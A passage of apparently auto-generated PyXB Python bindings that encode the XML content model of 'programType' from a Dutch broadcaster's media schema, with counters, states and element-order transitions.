cc_4 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
counters.add(cc_11)
cc_12 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
counters.add(cc_12)
cc_13 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
counters.add(cc_13)
cc_14 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
counters.add(cc_14)
cc_15 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
counters.add(cc_15)
cc_16 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
counters.add(cc_16)
cc_17 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
counters.add(cc_17)
cc_18 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
counters.add(cc_18)
cc_19 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
counters.add(cc_19)
cc_20 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
counters.add(cc_20)
cc_21 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
counters.add(cc_21)
cc_22 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
counters.add(cc_22)
cc_23 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
counters.add(cc_23)
cc_24 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
counters.add(cc_24)
cc_25 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
counters.add(cc_25)
cc_26 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
counters.add(cc_26)
cc_27 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
counters.add(cc_27)
cc_28 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
counters.add(cc_28)
cc_29 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
counters.add(cc_29)
cc_30 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
counters.add(cc_30)
cc_31 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
counters.add(cc_31)
cc_32 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
counters.add(cc_32)
cc_33 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 91, 10))
counters.add(cc_33)
cc_34 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 92, 10))
counters.add(cc_34)
cc_35 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 99, 10))
counters.add(cc_35)
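    # Each state wraps the ElementUse symbol for one child element of
    # programType. is_initial marks the elements that may open the content
    # ('crid' or 'broadcaster', since 'crid' is optional), and
    # final_update=None makes a state non-accepting; a set of
    # UpdateInstructions makes it accepting, so parsing may end there once
    # the listed counters have met their minimums.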
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'crid')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'broadcaster')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 237, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'portal')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'exclusive')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'region')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
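    # 'title' is the first required child element, so st_5 is the first
    # accepting state; every element after it is optional.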
final_update = set()
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'title')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 269, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'description')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 280, 6))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'genre')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 287, 6))
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'tag')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 288, 6))
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_7, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'intentions')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 289, 6))
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_8, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'targetGroups')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 290, 6))
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_9, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'geoLocations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 291, 6))
st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_10, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'topics')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 292, 6))
st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_11, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'source')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 293, 6))
st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_12, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'country')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 294, 6))
st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_13, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'language')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 295, 6))
st_15 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_15)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_14, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'isDubbed')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 296, 6))
st_16 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_16)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_15, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'availableSubtitles')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 297, 6))
st_17 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_17)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_16, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'avAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 298, 6))
st_18 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_18)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_17, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'releaseYear')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 299, 6))
st_19 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_19)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_18, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'duration')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 300, 6))
st_20 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_20)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_19, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'credits')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 301, 6))
st_21 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_21)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_20, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'award')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 302, 6))
st_22 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_22)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_21, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'descendantOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 303, 6))
st_23 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_23)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_22, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'memberOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 304, 6))
st_24 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_24)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_23, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ageRating')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 305, 6))
st_25 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_25)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_24, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'contentRating')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
st_26 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_26)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_25, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'email')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
st_27 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_27)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_26, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'website')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
st_28 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_28)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_27, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'twitter')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
st_29 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_29)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_28, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'teletext')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
st_30 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_30)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_29, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'prediction')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
st_31 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_31)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_30, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'locations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
st_32 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_32)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_31, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'relation')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
st_33 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_33)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_32, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'images')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
st_34 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_34)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_33, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvents')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 91, 10))
st_35 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_35)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_34, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'episodeOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 92, 10))
st_36 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_36)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_35, False))
symbol = pyxb.binding.content.ElementUse(programType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'segments')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 99, 10))
st_37 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_37)
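    # The transition sets below define the admissible element order. As
    # implemented in pyxb.utils.fac, a self-loop carries
    # UpdateInstruction(cc, True), which increments the occurrence counter,
    # while a transition that moves on to a later element carries
    # UpdateInstruction(cc, False), which resets the counter once its
    # minimum has been satisfied.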
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
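    # An empty instruction list ([]) means the transition needs no counter
    # bookkeeping: 'broadcaster' has no occurrence counter, so it may repeat
    # freely before any of the following optional elements or the required
    # 'title'.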
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
]))
transitions.append(fac.Transition(st_6, [
]))
transitions.append(fac.Transition(st_7, [
]))
transitions.append(fac.Transition(st_8, [
]))
transitions.append(fac.Transition(st_9, [
]))
transitions.append(fac.Transition(st_10, [
]))
transitions.append(fac.Transition(st_11, [
]))
transitions.append(fac.Transition(st_12, [
]))
transitions.append(fac.Transition(st_13, [
]))
transitions.append(fac.Transition(st_14, [
]))
transitions.append(fac.Transition(st_15, [
]))
transitions.append(fac.Transition(st_16, [
]))
transitions.append(fac.Transition(st_17, [
]))
transitions.append(fac.Transition(st_18, [
]))
transitions.append(fac.Transition(st_19, [
]))
transitions.append(fac.Transition(st_20, [
]))
transitions.append(fac.Transition(st_21, [
]))
transitions.append(fac.Transition(st_22, [
]))
transitions.append(fac.Transition(st_23, [
]))
transitions.append(fac.Transition(st_24, [
]))
transitions.append(fac.Transition(st_25, [
]))
transitions.append(fac.Transition(st_26, [
]))
transitions.append(fac.Transition(st_27, [
]))
transitions.append(fac.Transition(st_28, [
]))
transitions.append(fac.Transition(st_29, [
]))
transitions.append(fac.Transition(st_30, [
]))
transitions.append(fac.Transition(st_31, [
]))
transitions.append(fac.Transition(st_32, [
]))
transitions.append(fac.Transition(st_33, [
]))
transitions.append(fac.Transition(st_34, [
]))
transitions.append(fac.Transition(st_35, [
]))
transitions.append(fac.Transition(st_36, [
]))
transitions.append(fac.Transition(st_37, [
]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_4, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_5, False) ]))
st_7._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_22, [
